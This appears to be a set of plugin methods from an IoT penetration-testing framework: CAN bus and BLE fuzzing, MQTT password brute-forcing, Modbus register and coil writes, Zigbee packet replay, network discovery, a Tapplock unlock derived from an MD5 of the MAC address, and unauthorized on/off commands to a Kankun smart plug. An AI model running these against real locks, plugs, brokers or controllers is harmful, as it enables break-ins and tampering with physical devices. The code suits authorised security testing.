def execute(self): """Execute the test.""" TLog.generic( "Fuzz Writing to CANbus on interface({}), arbitration id(0x{:x}), " "extended?({}) data({})".format(self.args.iface, self.args.arbitid, self.args.exid, self.args.data)) bus = None try: if self.args.count < 1: raise ValueError("Illegal count value {}".format( self.args.count)) if self.args.wait < 0: raise ValueError("Illegal wait value {}".format( self.args.wait)) bus = CanBus(bustype="socketcan", channel=self.args.iface) for count in range(self.args.count): datacan = self.args.data while datacan.find("xx") >= 0: datacan = datacan.replace("xx", "{:02x}".format( randint(0, 0xFF)), 1) # main fuzzing magic with randint message = CanMessage(arbitration_id=self.args.arbitid, extended_id=self.args.exid, data=list(bytes.fromhex(datacan))) bus.send(message) TLog.success("{} : Wrote message {} ".format(count, datacan)) if self.args.wait > 0: sleep(self.args.wait) except BaseException: self.result.exception() finally: if bus: bus.shutdown()
def execute(self): """Execute the test.""" TLog.generic( "Reading ({}) messages from CANbus on interface({})".format( self.args.count, self.args.iface)) bus = None try: if self.args.count < 1: raise ValueError("Illegal count value {}".format( self.args.count)) bus = CanBus(bustype="socketcan", channel=self.args.iface) for cnt in range(1, self.args.count + 1): message = bus.recv(timeout=self.args.timeout) if message is None: raise TimeoutError( "Timed out while waiting for CAN message") if self.args.arbitid: if self.args.arbitid == message.arbitration_id: self.output_handler(logkwargs=LOGNORMAL, count=cnt, data=hexlify( message.data).decode()) else: self.output_handler(logkwargs=LOGNORMAL, count=cnt, arbitration_id="0x{:x}".format( message.arbitration_id), data=hexlify(message.data).decode()) except: # noqa: E722 self.result.exception() finally: if bus: bus.shutdown()
def scan(self): """ Scan for BLE devices in the proximity. :return: """ TLog.generic("Scanning BLE devices for {} second(s)".format( self.args.timeout)) try: devices = Ble.scan(iface=self.args.iface, tout=self.args.timeout) for device in devices: self.found = True TLog.success("(name={})(address={})".format( device.getValueText(Ble.ADTYPE_NAME) or "Unknown", device.addr)) if self.args.verbose is True: TLog.success(" (rssi={}dB)".format(device.rssi)) TLog.success(" (connectable={})".format( device.connectable)) for scan_data in device.getScanData(): TLog.success(" ({}={})".format( scan_data[1], scan_data[2])) except: # noqa: E722 self.reason = "Exception caught: {}".format(sysexcinfo()) if self.found is False and self.reason is None: self.reason = "No BLE devices found"
def execute(self): """Execute the test.""" TLog.generic( "Publishing message on topic ({}) to MQTT Broker ({}) on port " "({})".format(self.args.rhost, self.args.topic, self.args.rport)) credentials = None if self.args.user and self.args.passwd: credentials = { "username": self.args.user, "password": self.args.passwd } TLog.trydo( "Using authentication (username={})(password={})".format( self.args.user, self.args.passwd)) try: SimpleMqttClient.pub( self.args.topic, payload=self.args.msg, hostname=self.args.rhost, port=self.args.rport, auth=credentials, client_id=self.args.id, ) TLog.success("Done") except: # noqa: E722 self.result.exception()
def execute(self): """Execute the test.""" TLog.generic( "Subscribing to topic ({}) on MQTT broker ({}) on port ({})". format(self.args.topic, self.args.rhost, self.args.rport)) try: credentials = None if self.args.user and self.args.passwd: credentials = { "username": self.args.user, "password": self.args.passwd } TLog.trydo( "Using authentication (username={})(password={})".format( self.args.user, self.args.passwd)) messages = SimpleMqttClient.sub( self.args.topic, hostname=self.args.rhost, port=self.args.rport, client_id=self.args.id, auth=credentials, msg_count=self.args.count, ) for message in messages: TLog.success("(topic={})(payload={})".format( message.topic, str(message.payload))) except: # noqa: E722 self.result.exception()
def execute(self): TLog.generic( "Reading ({}) messages from CANbus on interface({})".format( self.args.count, self.args.iface)) bus = None try: if self.args.count < 1: raise ValueError("Illegal count value {}".format( self.args.count)) bus = CanBus(bustype="socketcan", channel=self.args.iface) for cnt in range(1, self.args.count + 1): m = bus.recv(timeout=self.args.timeout) if m is None: raise TimeoutError( "Timed out while waiting for CAN message") if self.args.arbitid: if self.args.arbitid == m.arbitration_id: TLog.success("(msg={})(data={})".format( cnt, hexlify(m.data).decode())) else: TLog.success( "(msg={})(arbitration_id=0x{:x})(data={})".format( cnt, m.arbitration_id, hexlify(m.data).decode())) except: self.result.exception() finally: if bus: bus.shutdown()
def execute(self): """Execute the test.""" TLog.generic( "Reading from Notify handle ({}) on BLE device ({})".format( hex(self.args.handle), self.args.addr)) timer = Timer(self.args.timeout) ndelegate = BleNotifyDelegate(self.notifycb) device = BlePeripheral() try: device.connect( self.args.addr, addrType=(ADDR_TYPE_RANDOM if self.args.randaddrtype else ADDR_TYPE_PUBLIC), ) TLog.generic("Enabling Notify on the handle") device.enable_notify(ndelegate, self.args.handle, write_response=True) while not timer.is_timeout(): device.waitForNotifications(1) if ndelegate.count() > 0: TLog.success("Total notification data received {}".format( ndelegate.count())) else: self.result.setstatus( passed=False, reason="No notification data received from BLE peripheral") except: # noqa: E722 self.result.exception() finally: device.disconnect()
def execute(self): """Execute tht test.""" TLog.generic( "Writing to CANbus on interface({}), arbitration id(0x{:x}), " "extended?({}) data({})".format(self.args.iface, self.args.arbitid, self.args.exid, self.args.data)) bus = None try: if self.args.count < 1: raise ValueError("Illegal count value {}".format( self.args.count)) bus = CanBus(bustype="socketcan", channel=self.args.iface) message = CanMessage( arbitration_id=self.args.arbitid, extended_id=self.args.exid, data=list(bytes.fromhex(self.args.data)), ) for count in range(1, self.args.count + 1): bus.send(message) TLog.success("Wrote message {}".format(count)) if self.args.wait and count < self.args.count: sleep(self.args.wait) except: # noqa: E722 self.result.exception() finally: if bus: bus.shutdown()
def execute(self): """Execute the mDNS discovery.""" service_names = list(MDNS_SERVICE_TYPES) if self.args.list: self.output_handler(supported_device_types=service_names) return TLog.generic("Search local network for mDNS enabled devices") if self.args.device: if self.args.device not in service_names: self.result.setstatus(passed=False, reason="Unknown device type specified") return service_names = [self.args.device] cnt = 0 for name in service_names: if self.args.verbose: TLog.trydo("Looking for {} devices".format(name)) details = MdnsDiscovery(name, scan_timeout=self.args.timeout) details.scan() for device in details.devices: cnt += 1 self.output_handler(device_number=cnt, name=device.name, address=device.address, port=device.port, server=device.server, type=device.type, priority=device.priority, weight=device.weight, properties=device.properties) self.output_handler(total_devices_discovered=cnt)
def execute(self): """Execute the test.""" dst_pan = None send_packet = False pcap_reader = None radio = None # Get Destination PAN address if self.args.pan: dst_pan = self.args.pan delay_sec = self.args.delay / 1000 TLog.generic("{:<13}: ({})".format("Channel", self.args.channel)) TLog.generic("{:<13}: ({})".format("File", self.args.pcapfile)) TLog.generic("{:<13}: ({})".format("Delay (seconds)", delay_sec)) if dst_pan: TLog.generic("{:<15}: ({})".format("Destination PAN", hex(dst_pan))) TLog.generic("") try: radio = Dot154Radio() pcap_reader = PcapDumpReader(self.args.pcapfile) radio.radio_on() radio.set_channel(self.args.channel) while True: packet = pcap_reader.read_next_packet() if packet: if not dst_pan and not is_ack_packet(packet): send_packet = True elif dst_pan and dst_pan == get_dst_pan_from_packet( packet): send_packet = True if send_packet: radio.inject_raw_packet(packet[0:-2]) send_packet = False time.sleep(delay_sec) else: break except: # noqa: E722 self.result.setstatus(passed=False, reason="Exception caught: {}".format( sysexcinfo())) finally: # Close file handler if pcap_reader: pcap_reader.close() # Turn OFF radio and exit if radio: self.output_handler( packets_received=radio.get_received_packets(), packets_transmitted=radio.get_transmitted_packets()) radio.radio_off()
def execute(self): """Execute the test.""" TLog.generic( "Writing the value ({}) to handle ({}) on BLE device ({})".format( self.args.value, hex(self.args.handle), self.args.addr ) ) device = BlePeripheral() try: device.connect( self.args.addr, addrType=( ADDR_TYPE_RANDOM if self.args.randaddrtype else ADDR_TYPE_PUBLIC ), ) device.writeCharacteristic( self.args.handle, bytes.fromhex(self.args.value), withResponse=(not self.args.noresponse), ) except: # noqa: E722 self.result.exception() finally: device.disconnect()
def display_uart_scan_result(result_list): """Displays uart scan result. Args: result_dict (dict): Dict of UART port scan result Returns: Nothing Raises: Nothing """ TLog.success("UART port scan result:") for ports in result_list: TLog.success("{:<8}: {}".format("BaudRate", ports["baud"])) pins = ports["pins"] TLog.success("UART pins:") if len(pins) == 1: TLog.success("\tTx pin: {}, Rx pin: {}".format( pins[0]["tx"], pins[0]["rx"])) else: TLog.success("\tPossible pin combinations:") for index, pin in enumerate(pins): TLog.success("\t{}. Tx pin: {}, Rx pin: {}".format( index + 1, pin["tx"], pin["rx"])) TLog.generic("")
def execute(self): """Execute the plugin.""" TLog.generic( "Publishing message on topic ({}) to MQTT Broker ({}) on port " "({})".format(self.args.topic, self.args.rhost, self.args.rport)) try: client = MqttClient(client_id=self.args.id) client.easy_config( user=self.args.user, passwd=self.args.passwd, on_connect=client.on_connectcb, on_publish=client.on_publishcb, ) client.connect(self.args.rhost, self.args.rport) client.publish(self.args.topic, self.args.msg, 1) client.loop_forever() if client.connect_rc != MQTT_ERR_SUCCESS: self.result.setstatus(passed=False, reason=client.rcstr(client.connect_rc)) TLog.fail("MQTT Connection Failed. Return code ({}:{})".format( client.connect_rc, client.rcstr(client.connect_rc))) else: TLog.success("Message published") except: # noqa: E722 self.result.exception()
def execute(self): """Execute the test.""" TLog.generic( "Reading data from i2c eeprom at address({}) using device({})". format(self.args.addr, self.args.url)) device = None try: device = I2cEepromManager.get_flash_device(self.args.url, self.args.chip, address=self.slaveaddr) length = self.args.length or (len(device) - self.args.addr) TLog.success("(chip size={} bytes)".format(len(device))) TLog.trydo("Reading {} bytes from start address {}".format( length, self.args.addr)) if self.args.addr + length > len(device): raise IndexError("Length is out of range of the chip size") start_time = time() data = device.read(self.args.addr, length) end_time = time() if self.args.wfile: TLog.trydo("Writing data to the file ({})".format( self.args.wfile)) output_file = open(self.args.wfile, "w+b") output_file.write(data) output_file.close() else: TLog.success("(data={})".format([hex(x) for x in data])) TLog.success( "Done. Total bytes read ({}) Time taken to read = {} secs". format(len(data), round(end_time - start_time, 2))) except: # noqa: E722 self.result.exception() finally: I2cEepromManager.close(device)
def execute(self): """Execute the test.""" TLog.generic( "Reading from handle ({}) on BLE device ({})".format( hex(self.args.handle), self.args.addr ) ) device = BlePeripheral() try: device.connect( self.args.addr, addrType=( ADDR_TYPE_RANDOM if self.args.randaddrtype else ADDR_TYPE_PUBLIC ), ) TLog.success( " (value={})".format( device.readCharacteristic( self.args.handle))) except: # noqa: E722 self.result.exception() finally: device.disconnect()
def execute(self): """Execute the test.""" TLog.generic( "Fuzzing the value ({}), iterations ({}) for handle ({}) on BLE device ({})" .format(self.args.value, self.args.iter, hex(self.args.handle), self.args.addr)) try: device = BlePeripheral() device.connect( self.args.addr, addrType=(Ble.ADDR_TYPE_RANDOM if self.args.randaddrtype else Ble.ADDR_TYPE_PUBLIC), ) for _ in range(self.args.iter): value = self.args.value while value.find("xx") >= 0: value = value.replace( "xx", "{:02x}".format(randint(0, 0xFF)), 1 # nosec ) TLog.trydo("Writing the fuzzed value ({})".format(value)) device.writeCharacteristic( self.args.handle, bytes.fromhex(value), withResponse=(not self.args.noresponse), ) except: # noqa: E722 self.result.exception() finally: device.disconnect()
def enumerate(self): """ Enumerate the services and/or characteristics of the specified BLE device. :return: """ # Documentation is wrong, the first keyword argument is deviceAddr instead of # deviceAddress. http://ianharvey.github.io/bluepy-doc/ if self.args.services is False and self.args.chars is False: TLog.fail( "Specify the enumerations option(s). Either or both - services, chars" ) self.reason = "Incomplete arguments" return TLog.generic( "Enumerating services/characteristics of the device {}".format( self.args.addr ) ) device = BlePeripheral() try: device.connect( self.args.addr, addrType=( ADDR_TYPE_RANDOM if self.args.randaddrtype else ADDR_TYPE_PUBLIC ), ) self.found = True if self.args.services is True: services = device.getServices() for service in services: TLog.success( "(service uuid={})(handlestart={})(handleend={})".format( service.uuid, hex(service.hndStart), hex(service.hndEnd) ) ) if self.args.chars is True: chars = device.getCharacteristics() for char in chars: TLog.success( "(characteristic uuid={})(handle={})".format( char.uuid, hex(char.getHandle()) ) ) if self.args.verbose is True: support_property = char.propertiesToString() supports_read = char.supportsRead() TLog.success(" (supported_properties={})".format(support_property)) if supports_read is True: TLog.success(" (value={})".format(char.read())) except: # noqa: E722 self.reason = "Exception caught: {}".format(sysexcinfo()) finally: device.disconnect() if self.found is False and self.reason is None: self.reason = "Couldn't find any devices"
def execute(self): c = ModbusTcpClient(self.args.rhost, port=self.args.rport) try: values = None # Check what to read i.e. coils, holding registers etc if self.args.item < 0 or self.args.item >= len(self.ITEMS): raise AttributeError("Unknown --item specified ({})".format( self.args.item)) TLog.generic( "Sending read command to Modbus Server ({}) on port ({})". format(self.args.rhost, self.args.rport)) TLog.generic("(item={})(address={})(count={})(unit={})".format( self.ITEMS[self.args.item], self.args.address, self.args.count, self.args.unit)) c.connect() if self.args.item == self.COIL: r = c.read_coils(self.args.address, self.args.count, unit=self.args.unit) if r.isError() == True: raise Exception(str(r)) values = r.bits elif self.args.item == self.DINPUT: # below r = class pymodbus.bit_read_message.ReadDiscreteInputsResponse r = c.read_discrete_inputs(self.args.address, self.args.count, unit=self.args.unit) if r.isError() == True: raise Exception(str(r)) values = r.bits elif self.args.item == self.HREG: # below r = class pymodbus.register_read_message.ReadHoldingRegistersResponse r = c.read_holding_registers(self.args.address, self.args.count, unit=self.args.unit) if r.isError() == True: raise Exception(str(r)) values = r.registers elif self.args.item == self.IREG: # below r = class pymodbus.register_read_message.ReadInputRegistersResponse r = c.read_input_registers(self.args.address, self.args.count, unit=self.args.unit) if r.isError() == True: raise Exception(str(r)) values = r.registers else: raise AttributeError("Unknown --item specified ({})".format( self.args.item)) for i in range(0, self.args.count): TLog.success("({}[{}]={})".format(self.ITEMS[self.args.item], self.args.address + i, values[i])) except: self.result.exception() finally: c.close()
def execute(self): """Execute the test.""" TLog.generic( "Attempting to authenticate with the MQTT broker ({}) on port " "({})".format(self.args.rhost, self.args.rport)) found = False try: if self.args.pfile and self.args.user: for password in readlines(self.args.pfile): if self.args.verbose: TLog.generic( "Checking username {} with password {}".format( self.args.user, password)) return_code, state = SimpleMqttClient.connauth( self.args.rhost, client_id=self.args.id, user=self.args.user, passwd=password, port=self.args.rport, ) if return_code == 0: TLog.success( "FOUND - (user={})(passwd={})(return code={}:{})". format(self.args.user, password, return_code, state)) found = True break elif self.args.verbose: TLog.fail( "Auth failed - (user={})(passwd={})(return code={}:{})" .format(self.args.user, password, return_code, state)) if found is False: self.result.setstatus( passed=False, reason="Auth failed for all passwords") else: return_code, state = SimpleMqttClient.connauth( self.args.rhost, client_id=self.args.id, user=self.args.user, passwd=self.args.passwd, port=self.args.rport, ) if return_code == 0: TLog.success( "FOUND - (user={})(passwd={})(return code={}:{})". format(self.args.user, self.args.passwd, return_code, state)) else: self.result.setstatus(passed=False, reason=state) if self.args.verbose: TLog.fail( "Auth failed - (user={})(passwd={})(return code={}:{})" .format(self.args.user, self.args.passwd, return_code, state)) except: # noqa: E722 self.result.exception()
def execute(self): """Execute the test.""" modbus_client = ModbusTcpClient(self.args.rhost, port=self.args.rport) try: if self.args.item < 0 or self.args.item >= len(READ_ITEMS): raise AttributeError("Unknown --item specified ({})".format( self.args.item)) TLog.generic( "Sending read command to Modbus Server ({}) on port ({})". format(self.args.rhost, self.args.rport)) TLog.generic("(item={})(address={})(count={})(unit={})".format( READ_ITEMS[self.args.item], self.args.address, self.args.count, self.args.unit, )) modbus_client.connect() if self.args.item == self.COIL: response = modbus_client.read_coils(self.args.address, self.args.count, unit=self.args.unit) if response.isError() is True: raise Exception(str(response)) values = response.bits elif self.args.item == self.DINPUT: response = modbus_client.read_discrete_inputs( self.args.address, self.args.count, unit=self.args.unit) if response.isError() is True: raise Exception(str(response)) values = response.bits elif self.args.item == self.HREG: response = modbus_client.read_holding_registers( self.args.address, self.args.count, unit=self.args.unit) if response.isError() is True: raise Exception(str(response)) values = response.registers elif self.args.item == self.IREG: response = modbus_client.read_input_registers( self.args.address, self.args.count, unit=self.args.unit) if response.isError() is True: raise Exception(str(response)) values = response.registers else: raise AttributeError("Unknown --item specified ({})".format( self.args.item)) for entry in range(0, self.args.count): TLog.success("({}[{}]={})".format( READ_ITEMS[self.args.item], self.args.address + entry, values[entry], )) except: # noqa: E722 self.result.exception() finally: modbus_client.close()
def execute(self): """Execute the test.""" modbus_client = ModbusTcpClient(self.args.rhost, port=self.args.rport) try: if self.args.item < 0 or self.args.item >= len(WRITE_ITEMS): raise AttributeError( "Unknown --item specified ({})".format(self.args.item) ) if self.args.count < 1: raise AttributeError( "Invalid --count specified ({})".format(self.args.count) ) TLog.generic( "Sending write command to Modbus Server ({}) on port ({})".format( self.args.rhost, self.args.rport ) ) TLog.generic( "(item={})(address={})(count={})(unit={})".format( WRITE_ITEMS[self.args.item], self.args.address, self.args.count, self.args.unit, ) ) modbus_client.connect() if self.args.item == COIL: value = bool(self.args.value != 0) TLog.trydo("Writing value(s): {}".format(value)) response = modbus_client.write_coils( self.args.address, [value] * self.args.count, unit=self.args.unit ) if response.isError() is True: raise Exception(str(response)) elif self.args.item == REG: TLog.trydo("Writing value(s): {}".format(self.args.value)) response = modbus_client.write_registers( self.args.address, [self.args.value] * self.args.count, unit=self.args.unit, ) if response.isError() is True: raise Exception(str(response)) else: raise AttributeError( "Unknown --item specified ({})".format(self.args.item) ) TLog.success("Values successfully written") except: # noqa: E722 self.result.exception() finally: modbus_client.close()
def execute(self): """Execute the test.""" TLog.generic( "Sending Unauthorized command ({}) to Kankun smart plug on ({}) port ({})" .format(self.args.cmd, self.args.rhost, self.args.rport)) op = None print("--cmd ({}) cmd is on? ({})".format(self.args.cmd, (self.args.cmd == "on"))) if self.args.cmd.lower() == "on": op = "open" elif self.args.cmd.lower() == "off": op = "close" else: self.result.setstatus(passed=False, reason="Unknown --cmd ({})".format( self.args.cmd)) return m = self.createmsg(op) ret = None TLog.trydo("Sending {} command: ({})".format(op, m)) # Step 1: Send command and receive the confirmation ID response ret = self.send_recv(self.args.rhost, self.args.rport, m) if ret is None: self.result.setstatus( passed=False, reason="Communication error while sending message({})".format( m), ) return TLog.success("Received response: ({})".format(ret.decode("utf-8"))) # Get the confirmation ID cid = self.get_confirmid(ret) if cid is None: self.result.setstatus( passed=False, reason="Couldn't extract confirmation id from ({})".format( ret), ) return TLog.success("Received Confirmation ID: ({})".format(cid)) m = self.createmsg("confirm", cid) TLog.trydo("Sending confirm command: ({})".format(m)) # Step 2: Send Confirmation command with the confirmation ID and receive ack response ret = self.send_recv(self.args.rhost, self.args.rport, m) if ret is None: self.result.setstatus( passed=False, reason="Communication error while sending message({})".format( m), ) return TLog.success("Received response: ({})".format(ret.decode("utf-8")))
def unlock(self, mac, name=None): """ Unlock the specified Tapplock. Args: mac(str): The BLE address of the Tapplock name(str): The name of the Tapplock as advertised over BLE Returns: Nothing """ device = BlePeripheral() try: TLog.trydo("Unlocking Tapplock ({})".format(mac)) # Get key1 and serial pairing_data = None if self.args.default is False: remote_mac = ":".join(mac.upper().split(":")[::-1]) md5_hash = md5(remote_mac.encode()).hexdigest() # nosec key1 = md5_hash[0:8] serial = md5_hash[16:24] TLog.generic( "(Calculated hash={})(key1={})(serial={})".format( md5_hash, key1, serial ) ) pairing_data = self.PAIRPREXIX + key1 + serial else: TLog.generic( "(default key1={})(default serial={})".format( self.DEFKEY, self.DEFSERIAL ) ) pairing_data = self.DEFPAIR # Calculate the checksum checksum = 0 for byte in bytes.fromhex(pairing_data): checksum = checksum + (byte % 255) checksum_string = "{:04x}".format(checksum) # Create the pairing data pairing_data = pairing_data + checksum_string[2:4] + checksum_string[0:2] device.connect(mac, addrType=ADDR_TYPE_RANDOM) device.writeCharacteristic(self.UNLOCKHNDL, bytes.fromhex(pairing_data)) device.writeCharacteristic(self.UNLOCKHNDL, bytes.fromhex(self.UNLOCKCMD)) self.output_handler(tlogtype=TLog.TRYDO, logkwargs=LOGPRETTY, name=name, addr=device.addr, sent_pair_data=pairing_data, sent_unlock_cmd=self.UNLOCKCMD) finally: device.disconnect()
def execute(self): """Execute the test.""" TLog.generic("Sending unauthorized command ({}) to Kankun smart " "plug on ({}) port ({})".format(self.args.cmd, self.args.rhost, self.args.rport)) if self.args.cmd.lower() == "on": operation = "open" elif self.args.cmd.lower() == "off": operation = "close" else: self.result.setstatus(passed=False, reason="Unknown --cmd ({})".format( self.args.cmd)) return message = self.create_message(operation) # Step 1: Send command and receive the confirmation ID response response = self.send_receive(self.args.rhost, self.args.rport, message) if response is None: self.result.setstatus( passed=False, reason="Communication error while sending message({})".format( message), ) return # Get the confirmation ID cid = self.get_confirm_id(response) if cid is None: self.result.setstatus( passed=False, reason="Couldn't extract confirmation ID from ({})".format( response), ) return self.output_handler(command=message, response=response, received_confirmation_id=cid) message = self.create_message("confirm", cid) # Step 2: Send confirmation command with the confirmation ID and receive ACK response response = self.send_receive(self.args.rhost, self.args.rport, message) if response is None: self.result.setstatus( passed=False, reason="Communication error while sending message({})".format( message), ) return self.output_handler(command2=message, response2=response)
def execute(self): """ Execute the plugin. Enumerate the services and/or characteristics of the specified BLE device. Returns: Nothing """ # Documentation is wrong, the first keyword argument is deviceAddr instead of # deviceAddress. http://ianharvey.github.io/bluepy-doc/ if self.args.services is False and self.args.chars is False: reason = "Incomplete args. Enumerate what? Either or both - services, chars" self.result.setstatus(passed=False, reason=reason) return TLog.generic( "Enumerating services/characteristics of the device {}".format( self.args.addr ) ) device = BlePeripheral() try: device.connect( self.args.addr, addrType=( ADDR_TYPE_RANDOM if self.args.randaddrtype else ADDR_TYPE_PUBLIC ), ) if self.args.services is True: services = device.getServices() for service in services: self.output_handler(service_uuid=str(service.uuid), service_uuid_name=service.uuid.getCommonName(), handle_start=hex(service.hndStart), handle_end=hex(service.hndEnd)) if self.args.chars is True: chars = device.getCharacteristics() for char in chars: chardict = {"char_uuid": str(char.uuid), "char_uuid_name": char.uuid.getCommonName(), "handle": hex(char.getHandle()), "supported_properties": char.propertiesToString()} if char.supportsRead(): chardict["readvalue"] = char.read() self.output_handler(**chardict) except: # noqa: E722 self.result.setstatus(passed=False, reason="Exception caught: {}".format(sysexcinfo())) finally: device.disconnect()
def execute(self): """Execute the test.""" TLog.generic("Sending GET request to CoRE discovery URI Path ({}) " "to CoAP Server {} on port {}".format( WKRPATH, self.args.rhost, self.args.rport)) try: scanner = CoapDiscovery(self.args.rhost, port=self.args.rport) scanner.scan() resources = scanner.services() for resource in resources: self.output_handler(**resource) self.output_handler(total_resources=len(resources)) except: # noqa: E722 self.result.exception()
def execute(self): """Execute the test.""" TLog.generic( "Sending request to server({}) on port({})".format( self.args.rhost, self.args.rport ) ) TLog.trydo("Searching imaginary database") TLog.success("Found matching entry in database - ({})".format("FooEntry")) snd = "GET / HTTP/1.1" TLog.generic( "Sending command to server ({}) on port ({})".format( self.args.rhost, self.args.rport ) ) if self.args.verbose is True: TLog.generic("More verbose output. Sending payload ({})".format(snd)) TLog.fail("No response received") TLog.generic("Re-sending command") response = "Response received from the server" # In case of failure (Nothing to do in case of success) if response: self.result.setstatus(passed=True, reason="Server is vulnerable") else: self.result.setstatus(passed=False, reason="Server is not vulnerable")
def execute(self): """Execute the test.""" TLog.generic("Sending request to server({}) on port({})".format( self.args.rhost, self.args.rport)) TLog.trydo("Searching imaginary database") self.output_handler(found_entry_in_db="FooEntry") # Or if you need to print extra message for only the console # but not required for the actual result output (chaining plugins) self.output_handler( msg="Found matching entry in database - ({})".format("FooEntry"), logkwargs=LOGNO, found_entry_in_db="FooEntry2") snd = "GET / HTTP/1.1" TLog.generic("Sending command to server ({}) on port ({})".format( self.args.rhost, self.args.rport)) if self.args.verbose is True: TLog.generic( "More verbose output. Sending payload ({})".format(snd)) TLog.fail("No response received") TLog.generic("Re-sending command") response = "Response received from the server" # In case of failure (Nothing to do in case of success) if response: self.output_handler(status="Server is vulnerable", services_available=["ssh", "foo"]) else: self.result.setstatus(passed=False, reason="Server is not vulnerable")
def execute(self): """Execute the test.""" count = self.args.count timeout = self.args.timeout packetcount = 0 pcap_writer = None radio = None TLog.generic("{:<13}: ({})".format("Channel", self.args.channel)) TLog.generic("{:<13}: ({})".format("File", self.args.filepath)) TLog.generic("{:<13}: ({})".format("Count", count)) TLog.generic("{:<13}: ({})".format("Time-Out", timeout)) try: # Get the Sniffer interface driver radio = Dot154Radio() # Create pcap file to dump the packet pcap_writer = PcapDumper(PCAP_DLT_IEEE802_15_4, self.args.filepath) # Turn ON radio sniffer radio.sniffer_on(self.args.channel) # kick start timer, if user set some timeout if timeout != 0: # Create Timer for timeout check timer = Timer() timer.timeout = timeout while True: packet = radio.read_raw_packet() if packet is not None: packetcount += 1 pcap_frame = PcapFrame(packet) pcap_writer.write_to_pcapfile(pcap_frame.get_pcap_frame()) if timeout != 0: if timer.is_timeout(): break if packetcount == count: break except: # noqa: E722 self.result.setstatus(passed=False, reason="Exception caught: {}".format( sysexcinfo())) finally: # Close file handler if pcap_writer: pcap_writer.close() # Turn OFF radio sniffer and exit if radio: # Execution Done self.output_handler( packets_received=radio.get_received_packets()) radio.sniffer_off()
def execute(self): """Execute the UPNP discovery.""" TLog.generic("Search local network for UPNP enabled devices") scanner = UpnpDiscovery(timeout=self.args.timeout) scanner.scan() count = 0 for dev in scanner.devices(): count += 1 TLog.generic("") TLog.success("Device {}:".format(count)) self.output_handler(logkwargs=LOGNO, **dev) recurse_list_dict(dev, self.log_callback, None) self.output_handler(total_devices_discovered=count)